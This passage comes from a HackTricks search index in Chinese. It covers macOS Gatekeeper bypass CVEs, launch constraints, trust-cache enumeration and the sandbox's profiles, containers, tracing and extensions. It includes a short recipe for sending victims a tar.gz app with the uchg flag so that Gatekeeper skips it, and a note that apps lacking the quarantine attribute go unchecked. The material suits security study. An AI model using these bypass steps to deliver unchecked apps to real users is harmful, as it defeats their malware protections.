\\"[+] compressing files\\"\\naa archive -d s/ -o app.aar","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2023-27951","id":"2567","title":"CVE-2023-27951"},"2568":{"body":"在 macOS Sonoma 14.0 中修复的 Gatekeeper 绕过漏洞允许经过精心制作的应用程序在没有提示的情况下运行。补丁发布后,详细信息被公开披露,并且在修复之前该问题在野外被积极利用。确保安装了 Sonoma 14.0 或更高版本。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » [CVE-2023-41067]","id":"2568","title":"[CVE-2023-41067]"},"2569":{"body":"在 macOS 14.4(2024年3月发布)中,源于 libarchive 对恶意 ZIP 文件的处理的 Gatekeeper 绕过漏洞允许应用程序逃避评估。更新到 14.4 或更高版本,Apple 已解决该问题。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » [CVE-2024-27853]","id":"2569","title":"[CVE-2024-27853]"},"257":{"body":"此漏洞突显了媒体会话初始化过程中的微妙平衡,以及需要精确的时序和验证机制以防止利用。建议开发人员实施推荐的安全修复,并确保强大的验证过程以缓解此类漏洞。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » WebRTC DoS » 结论","id":"257","title":"结论"},"2570":{"body":"流行提取工具(例如 The Unarchiver)中的几个漏洞导致从归档中提取的文件缺少 com.apple.quarantine xattr,从而启用了 Gatekeeper 绕过的机会。在测试时始终依赖 macOS Archive Utility 或已修补的工具,并在提取后验证 xattrs。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » 第三方解压工具错误传播隔离 (2023–2024)","id":"2570","title":"第三方解压工具错误传播隔离 (2023–2024)"},"2571":{"body":"创建一个包含应用程序的目录。 将 uchg 添加到应用程序。 将应用程序压缩为 tar.gz 文件。 将 tar.gz 文件发送给受害者。 受害者打开 tar.gz 文件并运行应用程序。 Gatekeeper 不会检查该应用程序。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » uchg (来自这个 talk )","id":"2571","title":"uchg (来自这个 talk )"},"2572":{"body":"在 \\".app\\" 包中,如果没有添加隔离 xattr,当执行时 Gatekeeper 不会被触发 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » 防止隔离 xattr","id":"2572","title":"防止隔离 xattr"},"2573":{"body":"Apple Platform Security: About the security content of macOS Sonoma 14.4 (includes CVE-2024-27853) – https://support.apple.com/en-us/HT214084 Eclectic Light: How macOS now tracks the provenance of apps – https://eclecticlight.co/2023/05/10/how-macos-now-tracks-the-provenance-of-apps/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » References","id":"2573","title":"References"},"2574":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » macOS 启动/环境约束与信任缓存","id":"2574","title":"macOS 启动/环境约束与信任缓存"},"2575":{"body":"macOS 中的启动约束旨在通过 规范进程的启动方式、启动者和启动来源 来增强安全性。自 macOS Ventura 开始引入,它们提供了一个框架,将 每个系统二进制文件分类为不同的约束类别 ,这些类别在 信任缓存 中定义,该列表包含系统二进制文件及其各自的哈希值。这些约束扩展到系统中的每个可执行二进制文件,涉及一组 规则 ,规定了 启动特定二进制文件的要求 。规则包括二进制文件必须满足的自我约束、其父进程必须满足的父约束,以及其他相关实体必须遵守的责任约束​。 该机制通过 环境约束 扩展到第三方应用程序,自 macOS Sonoma 开始,允许开发者通过指定 一组环境约束的键和值 来保护他们的应用程序。 您可以在约束字典中定义 启动环境和库约束 ,这些字典可以保存在**launchd 属性列表文件 中,或在代码签名中使用的 单独属性列表**文件中。 约束有 4 种类型: 自我约束 :应用于 运行中的 二进制文件的约束。 父进程 :应用于 进程的父进程 的约束(例如 launchd 运行 XP 服务) 责任约束 :应用于 在 XPC 通信中调用服务的进程 的约束 库加载约束 :使用库加载约束选择性地描述可以加载的代码 因此,当一个进程尝试通过调用 execve(_:_:_:) 或 posix_spawn(_:_:_:_:_:_:) 启动另一个进程时,操作系统会检查 可执行 文件是否 满足 其 自身的自我约束 。它还会检查 父进程 的可执行文件是否 满足 可执行文件的 父约束 ,以及 责任进程 的可执行文件是否 满足 可执行文件的责任进程约束。如果这些启动约束中的任何一个不满足,操作系统将不会运行该程序。 如果在加载库时, 库约束 的任何部分不成立,您的进程 将不会加载 该库。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 基本信息","id":"2575","title":"基本信息"},"2576":{"body":"LC 由 事实 和 逻辑操作 (与,或..)组成,结合事实。 LC 可以使用的事实已记录 。例如: is-init-proc:一个布尔值,指示可执行文件是否必须是操作系统的初始化进程(launchd)。 is-sip-protected:一个布尔值,指示可执行文件是否必须是受系统完整性保护(SIP)保护的文件。 on-authorized-authapfs-volume: 一个布尔值,指示操作系统是否从授权的、经过身份验证的 APFS 卷加载了可执行文件。 on-authorized-authapfs-volume:一个布尔值,指示操作系统是否从授权的、经过身份验证的 APFS 卷加载了可执行文件。 Cryptexes 卷 on-system-volume: 一个布尔值,指示操作系统是否从当前启动的系统卷加载了可执行文件。 在 /System 内... ... 当 Apple 二进制文件被签名时,它会 将其分配到信任缓存 中的 LC 类别。 iOS 16 LC 类别 已在此处 反向工程并记录 。 当前的 **LC 类别(macOS 14 - Sonoma)**已被反向工程,其 描述可以在这里找到 。 例如,类别 1 是: Category 1:\\nSelf Constraint: (on-authorized-authapfs-volume || on-system-volume) && launch-type == 1 && validation-category == 1\\nParent Constraint: is-init-proc (on-authorized-authapfs-volume || on-system-volume):必须在系统或Cryptexes卷中。 launch-type == 1:必须是系统服务(LaunchDaemons中的plist)。 validation-category == 1:操作系统可执行文件。 is-init-proc:Launchd","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » LC 类别","id":"2576","title":"LC 类别"},"2577":{"body":"您可以在这里找到更多信息 关于它 ,但基本上,它们在 AMFI (AppleMobileFileIntegrity) 中定义,因此您需要下载内核开发工具包以获取 KEXT 。以 kConstraintCategory 开头的符号是 有趣 的。提取它们后,您将获得一个 DER (ASN.1) 编码流,您需要使用 ASN.1 解码器 或 python-asn1 库及其 dump.py 脚本 andrivet/python-asn1 进行解码,这将为您提供一个更易理解的字符串。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 反向工程 LC 类别","id":"2577","title":"反向工程 LC 类别"},"2578":{"body":"这些是配置在 第三方应用程序 中的启动约束。开发人员可以选择在其应用程序中使用的 事实 和 逻辑运算符 来限制对自身的访问。 可以使用以下方法枚举应用程序的环境约束: bash codesign -d -vvvv app.app","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 环境约束","id":"2578","title":"环境约束"},"2579":{"body":"在 macOS 中有几个信任缓存: /System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/BaseSystemTrustCache.img4 /System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/StaticTrustCache.img4 /System/Library/Security/OSLaunchPolicyData 在 iOS 中,它看起来在 /usr/standalone/firmware/FUD/StaticTrustCache.img4 。 warning 在运行在 Apple Silicon 设备上的 macOS 上,如果 Apple 签名的二进制文件不在信任缓存中,AMFI 将拒绝加载它。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 信任缓存","id":"2579","title":"信任缓存"},"258":{"body":"Reading time: 15 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks","id":"258","title":"Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks"},"2580":{"body":"之前的信任缓存文件格式为 IMG4 和 IM4P ,IM4P 是 IMG4 格式的有效载荷部分。 您可以使用 pyimg4 来提取数据库的有效载荷: bash # Installation\\npython3 -m pip install pyimg4 # Extract payloads data\\ncp /System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/BaseSystemTrustCache.img4 /tmp\\npyimg4 img4 extract -i /tmp/BaseSystemTrustCache.img4 -p /tmp/BaseSystemTrustCache.im4p\\npyimg4 im4p extract -i /tmp/BaseSystemTrustCache.im4p -o /tmp/BaseSystemTrustCache.data cp /System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/StaticTrustCache.img4 /tmp\\npyimg4 img4 extract -i /tmp/StaticTrustCache.img4 -p /tmp/StaticTrustCache.im4p\\npyimg4 im4p extract -i /tmp/StaticTrustCache.im4p -o /tmp/StaticTrustCache.data pyimg4 im4p extract -i /System/Library/Security/OSLaunchPolicyData -o /tmp/OSLaunchPolicyData.data (另一个选项是使用工具 img4tool ,即使发布版本较旧,它也可以在 M1 上运行,并且如果您将其安装在正确的位置,它也可以在 x86_64 上运行)。 现在您可以使用工具 trustcache 以可读格式获取信息: bash # Install\\nwget https://github.com/CRKatri/trustcache/releases/download/v2.0/trustcache_macos_arm64\\nsudo mv ./trustcache_macos_arm64 /usr/local/bin/trustcache\\nxattr -rc /usr/local/bin/trustcache\\nchmod +x /usr/local/bin/trustcache # Run\\ntrustcache info /tmp/OSLaunchPolicyData.data | head\\ntrustcache info /tmp/StaticTrustCache.data | head\\ntrustcache info /tmp/BaseSystemTrustCache.data | head version = 2\\nuuid = 35EB5284-FD1E-4A5A-9EFB-4F79402BA6C0\\nentry count = 969\\n0065fc3204c9f0765049b82022e4aa5b44f3a9c8 [none] [2] [1]\\n00aab02b28f99a5da9b267910177c09a9bf488a2 [none] [2] [1]\\n0186a480beeee93050c6c4699520706729b63eff [none] [2] [2]\\n0191be4c08426793ff3658ee59138e70441fc98a [none] [2] [3]\\n01b57a71112235fc6241194058cea5c2c7be3eb1 [none] [2] [2]\\n01e6934cb8833314ea29640c3f633d740fc187f2 [none] [2] [2]\\n020bf8c388deaef2740d98223f3d2238b08bab56 [none] [2] [3] 信任缓存遵循以下结构,因此 LC 类别是第 4 列 c struct trust_cache_entry2 {\\nuint8_t cdhash[CS_CDHASH_LEN];\\nuint8_t hash_type;\\nuint8_t flags;\\nuint8_t constraintCategory;\\nuint8_t reserved0;\\n} __attribute__((__packed__)); 然后,您可以使用像 这个 这样的脚本来提取数据。 从这些数据中,您可以检查具有**启动约束值为0**的应用程序,这些应用程序没有受到约束( 在这里检查 每个值的含义)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 枚举信任缓存","id":"2580","title":"枚举信任缓存"},"2581":{"body":"启动约束将通过 确保进程不会在意外条件下执行 来缓解几种旧攻击:例如,从意外位置启动或被意外的父进程调用(如果只有launchd应该启动它)。 此外,启动约束还 缓解降级攻击 。 然而,它们 并不缓解常见的XPC 滥用、 Electron 代码注入或 dylib注入 ,而不进行库验证(除非可以加载库的团队ID是已知的)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 攻击缓解","id":"2581","title":"攻击缓解"},"2582":{"body":"在Sonoma版本中,一个显著的点是守护进程XPC服务的 责任配置 。XPC服务对自己负责,而不是连接的客户端负责。这在反馈报告FB13206884中有记录。这个设置可能看起来有缺陷,因为它允许与XPC服务进行某些交互: 启动XPC服务 :如果被认为是一个bug,这个设置不允许通过攻击者代码启动XPC服务。 连接到活动服务 :如果XPC服务已经在运行(可能由其原始应用程序激活),则没有连接到它的障碍。 虽然对XPC服务实施约束可能通过 缩小潜在攻击的窗口 而有益,但它并没有解决主要问题。确保XPC服务的安全性根本上需要 有效验证连接的客户端 。这仍然是加强服务安全性的唯一方法。此外,值得注意的是,提到的责任配置目前是有效的,这可能与预期设计不符。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » XPC守护进程保护","id":"2582","title":"XPC守护进程保护"},"2583":{"body":"即使要求应用程序必须 通过LaunchService打开 (在父约束中)。这可以通过使用**open (可以设置环境变量)或使用 Launch Services API**(可以指示环境变量)来实现。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » Electron保护","id":"2583","title":"Electron保护"},"2584":{"body":"https://youtu.be/f1HA5QhLQ7Y?t=24146 https://theevilbit.github.io/posts/launch_constraints_deep_dive/ https://eclecticlight.co/2023/06/13/why-wont-a-system-app-or-command-tool-run-launch-constraints-and-trust-caches/ https://developer.apple.com/videos/play/wwdc2023/10266/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 参考文献","id":"2584","title":"参考文献"},"2585":{"body":"Reading time: 22 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox","id":"2585","title":"macOS Sandbox"},"2586":{"body":"MacOS Sandbox(最初称为 Seatbelt) 限制应用程序 在沙箱内运行时只能执行 沙箱配置文件中指定的允许操作 。这有助于确保 应用程序仅访问预期的资源 。 任何具有 权限 com.apple.security.app-sandbox 的应用程序都将在沙箱内执行。 Apple 二进制文件 通常在沙箱内执行,所有来自 App Store 的应用程序都有该权限。因此,多个应用程序将在沙箱内执行。 为了控制进程可以或不能做什么, 沙箱在几乎所有进程可能尝试的操作中都有钩子 (包括大多数系统调用),使用 MACF 。然而, 根据 应用程序的 权限 ,沙箱可能对进程更加宽松。 沙箱的一些重要组件包括: 内核扩展 /System/Library/Extensions/Sandbox.kext 私有框架 /System/Library/PrivateFrameworks/AppSandbox.framework 在用户空间运行的 守护进程 /usr/libexec/sandboxd 容器 ~/Library/Containers","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 基本信息","id":"2586","title":"基本信息"},"2587":{"body":"每个沙箱应用程序将在 ~/Library/Containers/{CFBundleIdentifier} 中拥有自己的容器: bash ls -l ~/Library/Containers\\ntotal 0\\ndrwx------@ 4 username staff 128 May 23 20:20 com.apple.AMPArtworkAgent\\ndrwx------@ 4 username staff 128 May 23 20:13 com.apple.AMPDeviceDiscoveryAgent\\ndrwx------@ 4 username staff 128 Mar 24 18:03 com.apple.AVConference.Diagnostic\\ndrwx------@ 4 username staff 128 Mar 25 14:14 com.apple.Accessibility-Settings.extension\\ndrwx------@ 4 username staff 128 Mar 25 14:10 com.apple.ActionKit.BundledIntentHandler\\n[...] 在每个 bundle id 文件夹内,您可以找到应用的 plist 和 数据目录 ,其结构模仿主目录: bash cd /Users/username/Library/Containers/com.apple.Safari\\nls -la\\ntotal 104\\ndrwx------@ 4 username staff 128 Mar 24 18:08 .\\ndrwx------ 348 username staff 11136 May 23 20:57 ..\\n-rw-r--r-- 1 username staff 50214 Mar 24 18:08 .com.apple.containermanagerd.metadata.plist\\ndrwx------ 13 username staff 416 Mar 24 18:05 Data ls -l Data\\ntotal 0\\ndrwxr-xr-x@ 8 username staff 256 Mar 24 18:08 CloudKit\\nlrwxr-xr-x 1 username staff 19 Mar 24 18:02 Desktop -> ../../../../Desktop\\ndrwx------ 2 username staff 64 Mar 24 18:02 Documents\\nlrwxr-xr-x 1 username staff 21 Mar 24 18:02 Downloads -> ../../../../Downloads\\ndrwx------ 35 username staff 1120 Mar 24 18:08 Library\\nlrwxr-xr-x 1 username staff 18 Mar 24 18:02 Movies -> ../../../../Movies\\nlrwxr-xr-x 1 username staff 17 Mar 24 18:02 Music -> ../../../../Music\\nlrwxr-xr-x 1 username staff 20 Mar 24 18:02 Pictures -> ../../../../Pictures\\ndrwx------ 2 username staff 64 Mar 24 18:02 SystemData\\ndrwx------ 2 username staff 64 Mar 24 18:02 tmp caution 请注意,即使符号链接存在以“逃离”沙盒并访问其他文件夹,应用程序仍然需要 具有权限 才能访问它们。这些权限在RedirectablePaths中的**.plist**内。 **SandboxProfileData**是编译后的沙盒配置文件CFData,已转义为B64。 bash # Get container config\\n## You need FDA to access the file, not even just root can read it\\nplutil -convert xml1 .com.apple.containermanagerd.metadata.plist -o - # Binary sandbox profile\\nSandboxProfileData\\n\\nAAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf... # In this file you can find the entitlements:\\nEntitlements\\n\\ncom.apple.MobileAsset.PhishingImageClassifier2\\n\\ncom.apple.accounts.appleaccount.fullaccess\\n\\ncom.apple.appattest.spi\\n\\nkeychain-access-groups\\n\\n6N38VWS5BX.ru.keepcoder.Telegram\\n6N38VWS5BX.ru.keepcoder.TelegramShare\\n\\n[...] # Some parameters\\nParameters\\n\\n_HOME\\n/Users/username\\n_UID\\n501\\n_USER\\nusername\\n[...] # The paths it can access\\nRedirectablePaths\\n\\n/Users/username/Downloads\\n/Users/username/Documents\\n/Users/username/Library/Calendars\\n/Users/username/Desktop\\nRedirectedPaths\\n\\n[...] warning 由沙盒应用程序创建/修改的所有内容将获得 隔离属性 。如果沙盒应用程序尝试使用**open** 执行某些操作,这将通过触发 Gatekeeper 来阻止沙盒空间。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 容器","id":"2587","title":"容器"},"2588":{"body":"沙盒配置文件是指示在该 沙盒 中将被 允许/禁止 的内容的配置文件。它使用 沙盒配置文件语言 (SBPL) ,该语言使用 Scheme 编程语言。 这里可以找到一个示例: scheme (version 1) ; First you get the version (deny default) ; Then you shuold indicate the default action when no rule applies (allow network*) ; You can use wildcards and allow everything (allow file-read* ; You can specify where to apply the rule\\n(subpath \\"/Users/username/\\")\\n(literal \\"/tmp/afile\\")\\n(regex #\\"^/private/etc/.*\\")\\n) (allow mach-lookup\\n(global-name \\"com.apple.analyticsd\\")\\n) tip 查看这个 研究 以检查更多可能被允许或拒绝的操作。 请注意,在配置文件的编译版本中,操作的名称被其在一个数组中的条目所替代,该数组为dylib和kext所知,使得编译版本更短且更难阅读。 重要的 系统服务 也在其自定义 沙箱 内运行,例如 mdnsresponder 服务。您可以在以下位置查看这些自定义 沙箱配置文件 : /usr/share/sandbox /System/Library/Sandbox/Profiles 其他沙箱配置文件可以在 https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles 中查看。 App Store 应用使用 配置文件 /System/Library/Sandbox/Profiles/application.sb 。您可以在此配置文件中检查诸如 com.apple.security.network.server 的权限如何允许进程使用网络。 然后,一些 Apple 守护进程服务 使用位于 /System/Library/Sandbox/Profiles/*.sb 或 /usr/share/sandbox/*.sb 的不同配置文件。这些沙箱在调用 API sandbox_init_XXX 的主函数中应用。 SIP 是一个名为 platform_profile 的沙箱配置文件,位于 /System/Library/Sandbox/rootless.conf。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 沙盒配置文件","id":"2588","title":"沙盒配置文件"},"2589":{"body":"要使用 特定沙箱配置文件 启动应用程序,您可以使用: bash sandbox-exec -f example.sb /Path/To/The/Application touch touch.sb (version 1)\\n(deny default)\\n(allow file* (literal \\"/tmp/hacktricks.txt\\")) bash # This will fail because default is denied, so it cannot execute touch\\nsandbox-exec -f touch.sb touch /tmp/hacktricks.txt\\n# Check logs\\nlog show --style syslog --predicate \'eventMessage contains[c] \\"sandbox\\"\' --last 30s\\n[...]\\n2023-05-26 13:42:44.136082+0200 localhost kernel[0]: (Sandbox) Sandbox: sandbox-exec(41398) deny(1) process-exec* /usr/bin/touch\\n2023-05-26 13:42:44.136100+0200 localhost kernel[0]: (Sandbox) Sandbox: sandbox-exec(41398) deny(1) file-read-metadata /usr/bin/touch\\n2023-05-26 13:42:44.136321+0200 localhost kernel[0]: (Sandbox) Sandbox: sandbox-exec(41398) deny(1) file-read-metadata /var\\n2023-05-26 13:42:52.701382+0200 localhost kernel[0]: (Sandbox) 5 duplicate reports for Sandbox: sandbox-exec(41398) deny(1) file-read-metadata /var\\n[...] touch2.sb (version 1)\\n(deny default)\\n(allow file* (literal \\"/tmp/hacktricks.txt\\"))\\n(allow process* (literal \\"/usr/bin/touch\\"))\\n; This will also fail because:\\n; 2023-05-26 13:44:59.840002+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-metadata /usr/bin/touch\\n; 2023-05-26 13:44:59.840016+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-data /usr/bin/touch\\n; 2023-05-26 13:44:59.840028+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-data /usr/bin\\n; 2023-05-26 13:44:59.840034+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-metadata /usr/lib/dyld\\n; 2023-05-26 13:44:59.840050+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) sysctl-read kern.bootargs\\n; 2023-05-26 13:44:59.840061+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-data / touch3.sb (version 1)\\n(deny default)\\n(allow file* (literal \\"/private/tmp/hacktricks.txt\\"))\\n(allow process* (literal \\"/usr/bin/touch\\"))\\n(allow file-read-data (literal \\"/\\"))\\n; This one will work tip 请注意, Apple 编写的 软件 在 Windows 上 没有额外的安全措施 ,例如应用程序沙箱。 绕过示例: https://lapcatsoftware.com/articles/sandbox-escape.html https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c (他们能够写入以 ~$ 开头的沙箱外文件)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 沙箱配置文件示例","id":"2589","title":"沙箱配置文件示例"},"259":{"body":"","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 网络协议","id":"259","title":"网络协议"},"2590":{"body":"通过配置文件 可以跟踪沙箱每次检查操作时执行的所有检查。为此,只需创建以下配置文件: trace.sb (version 1)\\n(trace /tmp/trace.out) 然后只需使用该配置文件执行某些操作: bash sandbox-exec -f /tmp/trace.sb /bin/ls 在 /tmp/trace.out 中,您将能够看到每次调用时执行的每个沙箱检查(因此,有很多重复项)。 还可以使用 -t 参数跟踪沙箱:sandbox-exec -t /path/trace.out -p \\"(version 1)\\" /bin/ls 通过 API libsystem_sandbox.dylib 导出的函数 sandbox_set_trace_path 允许指定一个跟踪文件名,沙箱检查将写入该文件。 还可以通过调用 sandbox_vtrace_enable() 来做类似的事情,然后通过调用 sandbox_vtrace_report() 从缓冲区获取日志错误。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 沙箱跟踪","id":"2590","title":"沙箱跟踪"},"2591":{"body":"libsandbox.dylib 导出一个名为 sandbox_inspect_pid 的函数,该函数提供进程的沙箱状态列表(包括扩展)。但是,只有平台二进制文件可以使用此函数。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 沙箱检查","id":"2591","title":"沙箱检查"},"2592":{"body":"MacOS 将系统沙箱配置文件存储在两个位置: /usr/share/sandbox/ 和 /System/Library/Sandbox/Profiles 。 如果第三方应用程序携带 com.apple.security.app-sandbox 权限,则系统将 /System/Library/Sandbox/Profiles/application.sb 配置文件应用于该进程。 在 iOS 中,默认配置文件称为 container ,我们没有 SBPL 文本表示。在内存中,这个沙箱被表示为每个权限的允许/拒绝二叉树。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » MacOS 和 iOS 沙箱配置文件","id":"2592","title":"MacOS 和 iOS 沙箱配置文件"},"2593":{"body":"公司可能会使其应用程序 使用自定义沙箱配置文件 (而不是默认配置文件)。他们需要使用权限 com.apple.security.temporary-exception.sbpl ,该权限需要得到 Apple 的授权。 可以在 /System/Library/Sandbox/Profiles/application.sb: 中检查此权限的定义。 scheme (sandbox-array-entitlement\\n\\"com.apple.security.temporary-exception.sbpl\\"\\n(lambda (string)\\n(let* ((port (open-input-string string)) (sbpl (read port)))\\n(with-transparent-redirection (eval sbpl))))) 这将 在此权限之后评估字符串 作为沙箱配置文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » App Store 应用中的自定义 SBPL","id":"2593","title":"App Store 应用中的自定义 SBPL"},"2594":{"body":"sandbox-exec 工具使用 libsandbox.dylib 中的 sandbox_compile_* 函数。导出的主要函数有:sandbox_compile_file(期望文件路径,参数 -f),sandbox_compile_string(期望字符串,参数 -p),sandbox_compile_name(期望容器名称,参数 -n),sandbox_compile_entitlements(期望权限 plist)。 这个反向和 开源版本的工具 sandbox-exec 允许 sandbox-exec 将编译的沙箱配置文件写入文件中。 此外,为了将进程限制在容器内,它可能会调用 sandbox_spawnattrs_set[container/profilename] 并传递一个容器或现有配置文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 编译和反编译沙箱配置文件","id":"2594","title":"编译和反编译沙箱配置文件"},"2595":{"body":"在 macOS 上,与 iOS 不同,iOS 中的进程从一开始就被内核沙箱化, 进程必须自己选择进入沙箱 。这意味着在 macOS 上,进程在主动决定进入沙箱之前不会受到沙箱的限制,尽管 App Store 应用始终是沙箱化的。 如果进程具有权限:com.apple.security.app-sandbox,则在启动时会自动从用户空间沙箱化。有关此过程的详细说明,请查看: macOS Sandbox Debug & Bypass","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 调试和绕过沙箱","id":"2595","title":"调试和绕过沙箱"},"2596":{"body":"扩展允许为对象提供进一步的权限,并通过调用以下函数之一来实现: sandbox_issue_extension sandbox_extension_issue_file[_with_new_type] sandbox_extension_issue_mach sandbox_extension_issue_iokit_user_client_class sandbox_extension_issue_iokit_registry_rentry_class sandbox_extension_issue_generic sandbox_extension_issue_posix_ipc 扩展存储在可从进程凭据访问的第二个 MACF 标签槽中。以下 sbtool 可以访问此信息。 请注意,扩展通常由允许的进程授予,例如,当进程尝试访问照片并在 XPC 消息中被允许时,tccd 将授予 com.apple.tcc.kTCCServicePhotos 的扩展令牌。然后,进程需要消耗扩展令牌,以便将其添加到其中。 请注意,扩展令牌是长十六进制数,编码了授予的权限。然而,它们没有硬编码的允许 PID,这意味着任何可以访问令牌的进程可能会被 多个进程消耗 。 请注意,扩展与权限密切相关,因此拥有某些权限可能会自动授予某些扩展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 沙箱扩展","id":"2596","title":"沙箱扩展"},"2597":{"body":"根据这个 , sandbox_check 函数(它是一个 __mac_syscall)可以检查 在特定 PID、审计令牌或唯一 ID 下某个操作是否被沙箱允许 。 工具 sbtool (在 这里编译 )可以检查某个 PID 是否可以执行某些操作: bash sbtool mach #Check 